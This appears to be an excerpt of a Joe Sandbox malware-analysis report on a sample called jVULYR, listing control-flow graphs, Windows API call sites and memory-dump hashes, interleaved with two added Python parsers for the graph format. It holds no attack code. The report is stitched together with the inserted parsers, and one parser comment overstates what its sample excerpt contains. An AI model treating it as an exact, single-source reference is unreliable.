                                                   • From 11a3f98: 11a3fb2 -> 11a5568 -> 11a5578 -> 11a5588 -> 11a3fd3 -> 11a376c -> 11a3777 -> 11a5568 (CreateActCtxA) -> 11a8369, which fans out through 11a8651 / 11a8660 -> 11a8677 -> 11a8699 / 11a86a8 -> 11a86c5 -> 11a8768 / 11a8778 -> 11a8788 -> 11a5568 (CreateActCtxA) -> 11a8798 -> 11a5568 (CreateActCtxA) -> 11a87b3 -> 11a86de -> 11a8687 -> 11a838d. A second branch from 11a5578 goes 11a5650 -> 11a565f -> 11a5b41 / 11a5b50 -> 11a5b4f / 11a5b77 -> 11a57e4 (CreateActCtxA) -> 11a6be0 (CreateActCtxA) -> 11a6ca3, or ends in the self-looping block 11a5c54.
                                                   • From 8d58d90: 8d58f1b, and 8d58db6 <-> 8d59010 (PostMessageW) -> 8d5907c, a loop back into 8d58db6.
                                                   • From 11aded0: 11adf12 -> 11adf6a (CallWindowProcW) -> 11adf19, or 11aded0 -> 11adf19 directly.
                                                   API call sites in this graph: CreateActCtxA at 11a5568, 11a57e4, 11a6be0, 11a8699, 11a86a8, 11a8768 and 11a8778; PostMessageW at 8d59010; CallWindowProcW at 11adf6a.

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                   Basic blocks of 11a6bd6-11a6d29 (address range, API call, successors):
                                                   • 11a6bd6-11a6bd9 -> 11a6bda-11a6ca1
                                                   • 11a6bda-11a6ca1 (CreateActCtxA) -> 11a6ca3-11a6ca9, 11a6caa-11a6d04
                                                   • 11a6ca3-11a6ca9 -> 11a6caa-11a6d04
                                                   • 11a6caa-11a6d04 -> 11a6d06-11a6d09, 11a6d13-11a6d17
                                                   • 11a6d06-11a6d09 -> 11a6d13-11a6d17
                                                   • 11a6d13-11a6d17 -> 11a6d19-11a6d25, 11a6d28
                                                   • 11a6d19-11a6d25 -> 11a6d28
                                                   • 11a6d28 -> 11a6d29
                                                   • 11a6d29 -> 11a6d29 (self-loop)
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 011A6C91
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.376870946.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_23_2_11a0000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: 4a0ac44762944d4f42463676578d1bbdb47d47fbd2b268aa98c92f1cd19dae93
                                                  • Instruction ID: 7fbbd7cf5bba02c5e542b7eae1930c91d8cf5af212f78709d853c07a2573ccfb
                                                  • Opcode Fuzzy Hash: 4a0ac44762944d4f42463676578d1bbdb47d47fbd2b268aa98c92f1cd19dae93
                                                  • Instruction Fuzzy Hash: 1A4104B1C04718CEDB24CFA9D844B9EBBB1FF44308F548069D549AB250D7756985CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                   Basic blocks of 11a57e4-11a6d29 (address range, API call, successors):
                                                   • 11a57e4-11a6ca1 (CreateActCtxA) -> 11a6ca3-11a6ca9, 11a6caa-11a6d04
                                                   • 11a6ca3-11a6ca9 -> 11a6caa-11a6d04
                                                   • 11a6caa-11a6d04 -> 11a6d06-11a6d09, 11a6d13-11a6d17
                                                   • 11a6d06-11a6d09 -> 11a6d13-11a6d17
                                                   • 11a6d13-11a6d17 -> 11a6d19-11a6d25, 11a6d28
                                                   • 11a6d19-11a6d25 -> 11a6d28
                                                   • 11a6d28 -> 11a6d29
                                                   • 11a6d29 -> 11a6d29 (self-loop)
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 011A6C91
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.376870946.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_23_2_11a0000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: 8b4c76753b9345feda308d01952c58f8e30747994a8f8b8e85824bb5bc57e342
                                                  • Instruction ID: 73863dcafcd91c58d5814f945e88f19a83d43c801fb16ecc31a53c807a338f86
                                                  • Opcode Fuzzy Hash: 8b4c76753b9345feda308d01952c58f8e30747994a8f8b8e85824bb5bc57e342
                                                  • Instruction Fuzzy Hash: C64101B1C04718CBDB24CFA9D884B9EBBB1FF48308F648069D509BB240DBB56985CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                   Basic blocks of 11aded0-11adfec (address range, API call, successors):
                                                   • 11aded0-11adf0c -> 11adf12-11adf17, 11adfbc-11adfdc
                                                   • 11adf12-11adf17 -> 11adf19-11adf50, 11adf6a-11adfa2
                                                   • 11adf19-11adf50 -> 11adf52-11adf58, 11adf59-11adf68
                                                   • 11adf52-11adf58 -> 11adf59-11adf68
                                                   • 11adf59-11adf68 -> 11adfdf-11adfec
                                                   • 11adf6a-11adfa2 (CallWindowProcW) -> 11adfa4-11adfaa, 11adfab-11adfba
                                                   • 11adfa4-11adfaa -> 11adfab-11adfba
                                                   • 11adfab-11adfba -> 11adfdf-11adfec
                                                   • 11adfbc-11adfdc -> 11adfdf-11adfec
                                                  APIs
                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 011ADF91
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.376870946.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_23_2_11a0000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID: CallProcWindow
                                                  • String ID:
                                                  • API String ID: 2714655100-0
                                                  • Opcode ID: cbe123d2cbb3cfc7eb94a071e85dc036ce868019322fa14b57bd933faacf36cd
                                                  • Instruction ID: 35f12aac470443e1db667c661eaa25e8eb92e075b819be670aad01d10b38e764
                                                  • Opcode Fuzzy Hash: cbe123d2cbb3cfc7eb94a071e85dc036ce868019322fa14b57bd933faacf36cd
                                                  • Instruction Fuzzy Hash: 8D4158B89007458FDB14CF99D448AABBBF9FF88314F258458E518A7321D774A846CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                   Basic blocks of 8d59010-8d59097 (address range, API call, successors):
                                                   • 8d59010-8d5907a (PostMessageW) -> 8d5907c-8d59082, 8d59083-8d59097
                                                   • 8d5907c-8d59082 -> 8d59083-8d59097
                                                  APIs
                                                  • PostMessageW.USER32(?,?,?,?), ref: 08D5906D
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.405334436.0000000008D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_23_2_8d50000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID: MessagePost
                                                  • String ID:
                                                  • API String ID: 410705778-0
                                                  • Opcode ID: ae75a78539d94322d6e7384cf360bddddeb7852acfba22a615425f6d99fd7d0e
                                                  • Instruction ID: 66cec89451aa3c5f72573f43210de4a072a024f0682e17da198a368fb9c38377
                                                  • Opcode Fuzzy Hash: ae75a78539d94322d6e7384cf360bddddeb7852acfba22a615425f6d99fd7d0e
                                                  • Instruction Fuzzy Hash: 1D11E5B5800349DFDB10CF99D885BDEBFF8EB48324F10891AE954A7600C375A584CFA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

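Joe Sandbox exports the execution graphs and control-flow graphs above as one flattened text line: the graph kind, then node declarations of the form `<id> <address> [label]` (block ranges such as `11a6bd6-11a6bd9` in the control-flow variant) and edges of the form `<id>-><id>`, where a label is either an API name such as `CreateActCtxA` or the collapsed marker `2 API calls`. The following parser is an added example and is not part of this report or of the analysed sample; it reads that format, finds the entry points (nodes with no incoming edge) and lists which Windows APIs each entry point can reach, which is the triage question these graphs are drawn to answer. The grammar is inferred from the listings on this page, the function names are mine, and the inputs are short excerpts copied from the first execution graph, the second execution graph and the PostMessageW control-flow graph.

```python
import re
from collections import deque

# Added example, not part of the Joe Sandbox report or of the analysed sample.
# Joe Sandbox exports its execution graphs and control-flow graphs as one flattened
# line: the graph kind, then node declarations "<id> <addr>[-<addr>] [label ...]" and
# edges "<id>-><id>" in any order. Node ids are decimal, addresses are lowercase hex;
# a label is either one or more API names (CreateActCtxA, PostMessageW, ...) or the
# collapsed marker "<n> API calls". The grammar is inferred from the listings in this report.

NODE_ID = re.compile(r"^\d+$")
ADDRESS = re.compile(r"^[0-9a-f]+(-[0-9a-f]+)?$")
EDGE = re.compile(r"^(\d+)->(\d+)$")
COLLAPSED = re.compile(r"^(\d+) API calls$")

# Excerpts copied from the listings in this report (first execution graph, second
# execution graph, and the PostMessageW control-flow graph), trimmed to a few paths.
EXEC_EXCERPT = (
    "execution_graph 12923 11a3f98 12924 11a3fb2 12923->12924 12929 11a5568 12924->12929 "
    "12925 11a3fd3 12933 11a376c 12925->12933 12930 11a5578 12929->12930 12931 11a5588 "
    "12930->12931 12931->12925 12934 11a3777 12933->12934 12935 11a5568 CreateActCtxA "
    "12934->12935 12989 8d58d90 12990 8d58f1b 12989->12990 12991 8d58db6 12989->12991 "
    "12991->12990 12993 8d59010 PostMessageW 12991->12993 12994 8d5907c 12993->12994 "
    "12994->12991 12995 11aded0 12996 11adf12 12995->12996 12998 11adf19 12995->12998 "
    "12997 11adf6a CallWindowProcW 12996->12997 12996->12998 12997->12998"
)
COLLAPSED_EXCERPT = (
    "execution_graph 37563 2c0498c 37564 2c0493f 37563->37564 37565 2c049cb 37564->37565 "
    "37566 2c04cd8 2 API calls 37564->37566 37567 2c04c88 2 API calls 37564->37567 "
    "37566->37565 37567->37565"
)
CFG_EXCERPT = (
    "control_flow_graph 702 8d59010-8d5907a PostMessageW 703 8d59083-8d59097 702->703 "
    "704 8d5907c-8d59082 702->704 704->703"
)


def parse_graph(text):
    """Return (nodes, edges): nodes maps id -> {addr, apis, collapsed}, edges is [(src, dst)]."""
    tokens = text.split()
    if not tokens or tokens[0] not in ("execution_graph", "control_flow_graph"):
        raise ValueError("not a Joe Sandbox graph listing")
    nodes, edges, labels = {}, [], {}
    current = None  # node whose label tokens are still being collected
    i = 1
    while i < len(tokens):
        tok = tokens[i]
        edge = EDGE.match(tok)
        if edge:
            edges.append((int(edge.group(1)), int(edge.group(2))))
            current = None
            i += 1
        # A declaration is a decimal id immediately followed by a hex address or range;
        # this is what keeps the "2" of "2 API calls" from being read as a node id.
        elif NODE_ID.match(tok) and i + 1 < len(tokens) and ADDRESS.match(tokens[i + 1]):
            current = int(tok)
            nodes[current] = {"addr": tokens[i + 1], "apis": [], "collapsed": 0}
            labels[current] = []
            i += 2
        elif current is not None:
            labels[current].append(tok)
            i += 1
        else:
            raise ValueError(f"unexpected token {tok!r} at position {i}")
    for node_id, words in labels.items():
        label = " ".join(words)
        collapsed = COLLAPSED.match(label)
        if collapsed:
            nodes[node_id]["collapsed"] = int(collapsed.group(1))
        elif label:
            nodes[node_id]["apis"] = words
    return nodes, edges


def entry_points(nodes, edges):
    """Nodes with no incoming edge (self-loops ignored): where each traced path begins."""
    targets = {dst for src, dst in edges if src != dst}
    return sorted(n for n in nodes if n not in targets)


def reachable_apis(nodes, edges, start):
    """Breadth-first walk from `start`; distinct API names in the order they are first reached."""
    successors = {}
    for src, dst in edges:
        successors.setdefault(src, []).append(dst)
    seen, queue, apis = {start}, deque([start]), []
    while queue:
        node = queue.popleft()
        for api in nodes.get(node, {}).get("apis", []):
            if api not in apis:
                apis.append(api)
        for nxt in successors.get(node, []):
            if nxt not in seen:
                seen.add(nxt)
                queue.append(nxt)
    return apis


def api_call_sites(nodes):
    """Map each API name to the sorted addresses (or block ranges) annotated with it."""
    sites = {}
    for node in nodes.values():
        for api in node["apis"]:
            sites.setdefault(api, set()).add(node["addr"])
    return {api: sorted(addrs) for api, addrs in sites.items()}


if __name__ == "__main__":
    for kind, text in (("execution graph", EXEC_EXCERPT), ("control-flow graph", CFG_EXCERPT)):
        nodes, edges = parse_graph(text)
        print(f"{kind}: {len(nodes)} nodes, {len(edges)} edges, call sites {api_call_sites(nodes)}")
        for root in entry_points(nodes, edges):
            print(f"  from {nodes[root]['addr']}: {reachable_apis(nodes, edges, root) or ['no API']}")
```

Collapsed nodes ("2 API calls") deliberately contribute no API names: the export does not say which two calls they stand for, so the parser records only the count and a reachability query over the second execution graph reports the RtlEncodePointer and LoadLibraryA sites it can see rather than guessing at the rest. Block ranges in the control-flow variant are kept as strings, so the same functions work on both graph kinds.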
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.375331734.0000000000EAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EAD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_23_2_ead000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e0e4cecf88c55ec70851149b02b3945fc949d7d08f90aaaf4a456a8727e77523
                                                  • Instruction ID: 26bf3fcbe22e598c1a8a6f95df1586ad7daffd9f1b2fadea9d69a89276cee300
                                                  • Opcode Fuzzy Hash: e0e4cecf88c55ec70851149b02b3945fc949d7d08f90aaaf4a456a8727e77523
                                                  • Instruction Fuzzy Hash: 6F212471508240DFCB05CF40DDC0B26BB65FB8D318F248569E9065E656C336E816DBB1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.375331734.0000000000EAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EAD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_23_2_ead000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 66e7225576c7594dc19d32e46e5e0d07d6d724aadd28279e279975717c04c1fd
                                                  • Instruction ID: a6f8682daeea4129694139d928a27a2237d128cd845509b0e472c819662c8ac5
                                                  • Opcode Fuzzy Hash: 66e7225576c7594dc19d32e46e5e0d07d6d724aadd28279e279975717c04c1fd
                                                  • Instruction Fuzzy Hash: 152145B1908244DFCB04CF00DDC0B26BBA5FB8D32CF2485A8E9065F606C336E856DBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.375368829.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_23_2_ebd000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fdf2b0bb61af59d2050faa4d33fb237cf7b95165d9424d70e424a8b9d02b679d
                                                  • Instruction ID: 3a0792ef82f9cdfc3a96658c8174614d34abb9f26541b0fc1e194b54d8a728d1
                                                  • Opcode Fuzzy Hash: fdf2b0bb61af59d2050faa4d33fb237cf7b95165d9424d70e424a8b9d02b679d
                                                  • Instruction Fuzzy Hash: D821257560C240DFCB14EF14D9C0B67BB66FB88318F24C569D9095B246D33AD846DAA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.375368829.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_23_2_ebd000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5b6f535c514200c1485cf6676a5f5689d0d9e58fb823ae6a89f4dfaaa530063e
                                                  • Instruction ID: 2001d9d40153c2e92e9f3e9eec0843c26e52b4e8b13a7794cc64a10a04f40b09
                                                  • Opcode Fuzzy Hash: 5b6f535c514200c1485cf6676a5f5689d0d9e58fb823ae6a89f4dfaaa530063e
                                                  • Instruction Fuzzy Hash: B2213771508284DFCB05CF50DDC0BA7BB65FB88318F24C56DD9095B256D336D846CB61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.375368829.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_23_2_ebd000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 87387256be4096435f416303e011742193a2f9dcc8f72b288753cc61e2269b27
                                                  • Instruction ID: d2b9434e7eeb374ba3bad5b3172a53d5545331b0aa33237b9183018da90a3ac8
                                                  • Opcode Fuzzy Hash: 87387256be4096435f416303e011742193a2f9dcc8f72b288753cc61e2269b27
                                                  • Instruction Fuzzy Hash: 9121807550D3C08FCB12CF20D990756BF71EB46314F28C5EAD8498B697C33A980ACB62
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.375331734.0000000000EAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EAD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_23_2_ead000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 01630ae60a6f14e2ae99e77285fa1d8ce58a37d8d61a71497013aec5d44c3189
                                                  • Instruction ID: 883db3a4914d506cd0c9710521f593c996189893e170356a8c6709329ac04f1d
                                                  • Opcode Fuzzy Hash: 01630ae60a6f14e2ae99e77285fa1d8ce58a37d8d61a71497013aec5d44c3189
                                                  • Instruction Fuzzy Hash: 29219076404280DFCB16CF50D9C4B16BF71FB89324F2485A9D8051A656C336D866CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.375331734.0000000000EAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EAD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_23_2_ead000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ba42586fe108d7709ad1863fbbc2413aba52469b4b07adaff3d52a3c2845cd8f
                                                  • Instruction ID: 8f95e25447e6ffeff269c0af64fe45869a6a6ab9b45e50da365b80aa9bacbbfe
                                                  • Opcode Fuzzy Hash: ba42586fe108d7709ad1863fbbc2413aba52469b4b07adaff3d52a3c2845cd8f
                                                  • Instruction Fuzzy Hash: 8611B176804280CFCF11CF10D9C4B16BF71FB99328F2486A9D8061F616C33AE85ACBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.375368829.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_23_2_ebd000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1ec00427063a39186f2fb4650df0103d6deb5ba7185f4ec336243a5f515f8492
                                                  • Instruction ID: 78522e22a12d796bda8636bee384d3cfec7f324ca63eb857f36ea20b3d6290a7
                                                  • Opcode Fuzzy Hash: 1ec00427063a39186f2fb4650df0103d6deb5ba7185f4ec336243a5f515f8492
                                                  • Instruction Fuzzy Hash: F111BE75508280DFCB12CF50C9C0B56BB61FB84328F24C6A9D8494B666C33AD85ACF51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.375331734.0000000000EAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EAD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_23_2_ead000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 83c87b1ae345b2fc1270190c2c02597dfd80dca3b4add8fc7caae3b9b45a4d4e
                                                  • Instruction ID: 8d056d7e7bafcd16b010e2c42a7ad85677b9ffbc595bab47a0a45673f8672be0
                                                  • Opcode Fuzzy Hash: 83c87b1ae345b2fc1270190c2c02597dfd80dca3b4add8fc7caae3b9b45a4d4e
                                                  • Instruction Fuzzy Hash: E501FC7100C3809EE7144E25CD84766BB98DF4A37CF14855BFA066F646C379A844C671
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.375331734.0000000000EAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EAD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_23_2_ead000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6c084e4802d2ff18f8209eb3ffb88f93972c64bac73e8d95f9c286f0ad0669d8
                                                  • Instruction ID: 6fa2b7576def83265722955ebaa981ea70cd16112cd55ed38b3a706e586a3525
                                                  • Opcode Fuzzy Hash: 6c084e4802d2ff18f8209eb3ffb88f93972c64bac73e8d95f9c286f0ad0669d8
                                                  • Instruction Fuzzy Hash: 80F062714082849EEB148E16CC84B62FB98EB46778F18C45BFD095F686C379A844CAB1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Execution Graph

                                                  Execution Coverage:8.6%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:6.2%
                                                  Total number of Nodes:65
                                                  Total number of Limit Nodes:1
                                                  execution_graph 37539 2c0b0d0 37540 2c0b0ee 37539->37540 37543 2c09e18 37540->37543 37542 2c0b125 37544 2c0cff8 LoadLibraryA 37543->37544 37546 2c0d0d4 37544->37546 37547 2c04560 37548 2c04574 37547->37548 37551 2c047aa 37548->37551 37549 2c0457d 37552 2c047b3 37551->37552 37557 2c04880 37551->37557 37563 2c0498c 37551->37563 37569 2c049a6 37551->37569 37575 2c04890 37551->37575 37552->37549 37558 2c048d4 37557->37558 37559 2c049cb 37558->37559 37581 2c04cd8 37558->37581 37590 2c04c98 37558->37590 37595 2c04c88 37558->37595 37564 2c0493f 37563->37564 37565 2c049cb 37564->37565 37566 2c04cd8 2 API calls 37564->37566 37567 2c04c88 2 API calls 37564->37567 37568 2c04c98 2 API calls 37564->37568 37566->37565 37567->37565 37568->37565 37570 2c049b9 37569->37570 37571 2c049cb 37569->37571 37572 2c04cd8 2 API calls 37570->37572 37573 2c04c88 2 API calls 37570->37573 37574 2c04c98 2 API calls 37570->37574 37572->37571 37573->37571 37574->37571 37576 2c048d4 37575->37576 37577 2c049cb 37576->37577 37578 2c04cd8 2 API calls 37576->37578 37579 2c04c88 2 API calls 37576->37579 37580 2c04c98 2 API calls 37576->37580 37578->37577 37579->37577 37580->37577 37582 2c04ce6 37581->37582 37583 2c04c96 37582->37583 37585 2c04d0c 37582->37585 37588 2c04cd8 RtlEncodePointer 37583->37588 37600 2c04ce8 37583->37600 37584 2c04cb6 37584->37559 37586 2c04d75 37585->37586 37587 2c04d4c RtlEncodePointer 37585->37587 37586->37559 37587->37586 37588->37584 37591 2c04ca6 37590->37591 37593 2c04cd8 2 API calls 37591->37593 37594 2c04ce8 RtlEncodePointer 37591->37594 37592 2c04cb6 37592->37559 37593->37592 37594->37592 37596 2c04ca6 37595->37596 37598 2c04cd8 2 API calls 37596->37598 37599 2c04ce8 RtlEncodePointer 37596->37599 37597 2c04cb6 37597->37559 37598->37597 37599->37597 37601 2c04d22 37600->37601 37602 2c04d4c RtlEncodePointer 37601->37602 37603 2c04d75 37601->37603 37602->37603 37603->37584 37535 634ceb0 37536 634cecf 37535->37536 37537 634cf03 LdrInitializeThunk 37536->37537 37538 634cf20 37537->37538 37608 634db40 37610 634db65 37608->37610 37609 634dcdf 37610->37609 37611 634e2c4 LdrInitializeThunk 37610->37611 37611->37610 37604 6348308 37605 6348327 LdrInitializeThunk 37604->37605 37607 634835b 37605->37607
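The execution graph above is a whitespace-flattened node and edge list: each node is "<id> <hex address> [annotation]", where the annotation is either a resolved API name (LoadLibraryA, RtlEncodePointer, LdrInitializeThunk) or a summary such as "2 API calls", and each edge is "<id>-><id>". The question an analyst asks of such a graph is which top-level functions in the dumped region end up at which Windows API, which is what the following Python answers. It is an added example, not part of the Joe Sandbox report or of Joe Sandbox's tooling; the grammar is inferred from the listing itself, and the embedded sample is an excerpt copied from the graph above, including the report's own line break between "37537" and "634cf03".

```python
import re
from collections import defaultdict, deque

# Excerpt copied from the report's execution_graph listing above.
SAMPLE_GRAPH = """execution_graph 37539 2c0b0d0 37540 2c0b0ee 37539->37540 37543 2c09e18 37540->37543
37542 2c0b125 37544 2c0cff8 LoadLibraryA 37543->37544 37546 2c0d0d4 37544->37546
37547 2c04560 37548 2c04574 37547->37548 37551 2c047aa 37548->37551 37549 2c0457d
37552 2c047b3 37551->37552 37557 2c04880 37551->37557 37563 2c0498c 37551->37563 37552->37549
37558 2c048d4 37557->37558 37559 2c049cb 37558->37559 37581 2c04cd8 37558->37581
37564 2c0493f 37563->37564 37565 2c049cb 37564->37565 37566 2c04cd8 2 API calls 37564->37566 37566->37565
37582 2c04ce6 37581->37582 37583 2c04c96 37582->37583 37585 2c04d0c 37582->37585
37588 2c04cd8 RtlEncodePointer 37583->37588 37584 2c04cb6 37584->37559
37586 2c04d75 37585->37586 37587 2c04d4c RtlEncodePointer 37585->37587 37586->37559 37587->37586 37588->37584
37535 634ceb0 37536 634cecf 37535->37536 37537
634cf03 LdrInitializeThunk 37536->37537 37538 634cf20 37537->37538
37608 634db40 37610 634db65 37608->37610 37609 634dcdf 37610->37609 37611 634e2c4 LdrInitializeThunk 37610->37611 37611->37610
37604 6348308 37605 6348327 LdrInitializeThunk 37604->37605 37607 634835b 37605->37607"""

EDGE_RE = re.compile(r"(\d+)->(\d+)")
ADDR_RE = re.compile(r"[0-9a-f]{6,16}")   # hex code address, as printed by the report
API_RE = re.compile(r"[A-Za-z_]\w*")       # a single identifier = resolved API name


def parse_execution_graph(text):
    """Return (nodes, edges) with nodes = {id: (hex_address, annotation)}.

    Grammar inferred from the report: a node starts with a decimal id
    followed by a hex address; any following tokens up to the next node or
    edge are its annotation; an edge is 'src->dst'. Splitting on all
    whitespace makes line breaks inside the listing irrelevant."""
    tokens = text.split()
    nodes, edges = {}, []
    current = None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE_RE.fullmatch(tok)
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
            current = None
        elif tok.isdigit() and i + 1 < len(tokens) and ADDR_RE.fullmatch(tokens[i + 1]):
            current = int(tok)
            nodes[current] = (tokens[i + 1], "")
            i += 1                          # consume the address token too
        elif current is not None:           # annotation text for the open node
            addr, ann = nodes[current]
            nodes[current] = (addr, (ann + " " + tok).strip())
        i += 1
    return nodes, edges


def api_entry_points(nodes, edges):
    """Map each resolved API name to the sorted addresses of the graph roots
    (nodes with no incoming edge) from which a call to it is reachable."""
    succ = defaultdict(list)
    has_pred = set()
    for src, dst in edges:
        succ[src].append(dst)
        has_pred.add(dst)
    roots = [n for n in nodes if n not in has_pred]
    # Only single-identifier annotations are API names; "2 API calls" is a summary.
    api_nodes = {n for n, (_, ann) in nodes.items() if API_RE.fullmatch(ann)}
    reached = defaultdict(set)
    for root in roots:
        seen, queue = {root}, deque([root])
        while queue:                        # BFS; 'seen' also breaks cycles
            n = queue.popleft()
            if n in api_nodes:
                reached[nodes[n][1]].add(nodes[root][0])
            for nxt in succ[n]:
                if nxt not in seen:
                    seen.add(nxt)
                    queue.append(nxt)
    return {api: sorted(addrs) for api, addrs in reached.items()}


if __name__ == "__main__":
    nodes, edges = parse_execution_graph(SAMPLE_GRAPH)
    print(f"{len(nodes)} nodes, {len(edges)} edges")
    for api, roots in sorted(api_entry_points(nodes, edges).items()):
        print(f"{api:<20} reached from {', '.join(roots)}")
```

On the excerpt this yields LoadLibraryA reached only from 2c0b0d0, RtlEncodePointer only from 2c04560, and LdrInitializeThunk from the three roots in the 0x06340000 region, which matches the per-function control-flow graphs that follow. Node 2c0b125 is a root that reaches nothing and is reported as such rather than dropped.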

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
